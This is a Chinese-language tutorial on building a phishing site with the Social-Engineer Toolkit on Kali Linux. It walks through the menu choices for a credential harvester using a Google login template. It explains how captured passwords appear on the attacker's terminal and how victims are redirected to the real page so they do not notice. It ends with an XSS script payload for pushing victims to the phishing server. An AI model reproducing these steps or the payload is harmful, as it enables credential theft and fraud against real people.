钓鱼网站制作

简介

钓鱼网站通常是指伪装成银行及电子商务等网站,主要危害是窃取用户提交的银行帐号、密码等私密信息。所谓“钓鱼网站”是一种网络欺诈行为,指不法分子利用各种手段,仿冒真实网站的URL地址以及页面内容,或者利用真实网站服务器程序上的漏洞在站点的某些网页中插入危险的HTML代码,以此来骗取用户银行或信用卡账号、密码等私人资料。恶意团购网站或购物网站,假借“限时抢购”、“秒杀”等噱头,让用户不假思索地提供个人信息和银行账号,这些黑心网站主可直接获取用户输入的个人资料和网银账号密码信息,进而获利。

制作

利用kali的SET工具

输入setoolkit启动SET工具

启动后,可以看到有如下选项可以选择

1
2
3
4
5
6
7
8
9
10
11
12
 Select from the menu:

1) Social-Engineering Attacks # 社会工程攻击
2) Penetration Testing (Fast-Track) # 渗透测试(快速通道)
3) Third Party Modules # 第三方模块
4) Update the Social-Engineer Toolkit # 更新 SET
5) Update SET configuration # 更新 SET 配置
6) Help, Credits, and About # 帮助

99) Exit the Social-Engineer Toolkit # 退出

set> 1

选择1,然后看到如下界面:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
 Select from the menu:

1) Spear-Phishing Attack Vectors # 鱼叉式网络钓鱼攻击
2) Website Attack Vectors # 网站攻击
3) Infectious Media Generator # 感染性介质生成
4) Create a Payload and Listener # 创建 Payload 和 监听器
5) Mass Mailer Attack # 群发邮件
6) Arduino-Based Attack Vector # 基于 Arduino 的攻击
7) Wireless Access Point Attack Vector # 无线接入点攻击
8) QRCode Generator Attack Vector # 二维码生成器攻击
9) Powershell Attack Vectors # Powershell 攻击
10) Third Party Modules # 第三方模块

99) Return back to the main menu. # 返回主菜单

set> 2

选择2,可以看到如下界面

1
2
3
4
5
6
7
8
9
10
11
1) Java Applet Attack Method           # Java Applet 攻击
2) Metasploit Browser Exploit Method # Metasploit Browser 浏览器攻击
3) Credential Harvester Attack Method # 凭证窃取攻击
4) Tabnabbing Attack Method # 标签页劫持
5) Web Jacking Attack Method # 网页劫持攻击
6) Multi-Attack Web Method # 综合网页攻击
7) HTA Attack Method # HTA 攻击

99) Return to Main Menu # 返回主菜单

set:webattack> 3

选择3,进入如下菜单

1
2
3
4
5
1) Web Templates       # 网站模板
2) Site Cloner # 站点克隆
3) Custom Import # 自定义导入

99) Return to Webattack Menu # 返回主菜单

1)是预定义的模板,有google还有twitter的

2)是克隆网站的页面

3)使用自己写的页面

我们选择1

这里意思让我们将192.168.253.180即本地做为钓鱼网站服务器,按回车

让我们选择模板,这里选择google模板作为前端页面

钓鱼网站启动成功,访问192.168.253.130即可进入钓鱼网站

输入用户名密码点击回车后,就可以在kali终端上看到密码

然后服务器会给客户端重定向到正常的google登陆页面,受害者以为自己第一遍输入错误来达到以假乱真

该钓鱼网站尝尝与xss漏洞一块使用

比如利用存储型xss执行如下代码来让受害者访问钓鱼网站

1
<script>window.location.href="http://192.168.253.130/"</script>

或者利用反射型xss,让受害者点击精心构造的链接从而执行如上代码

https://www.sqlsec.com/2020/10/xss2.html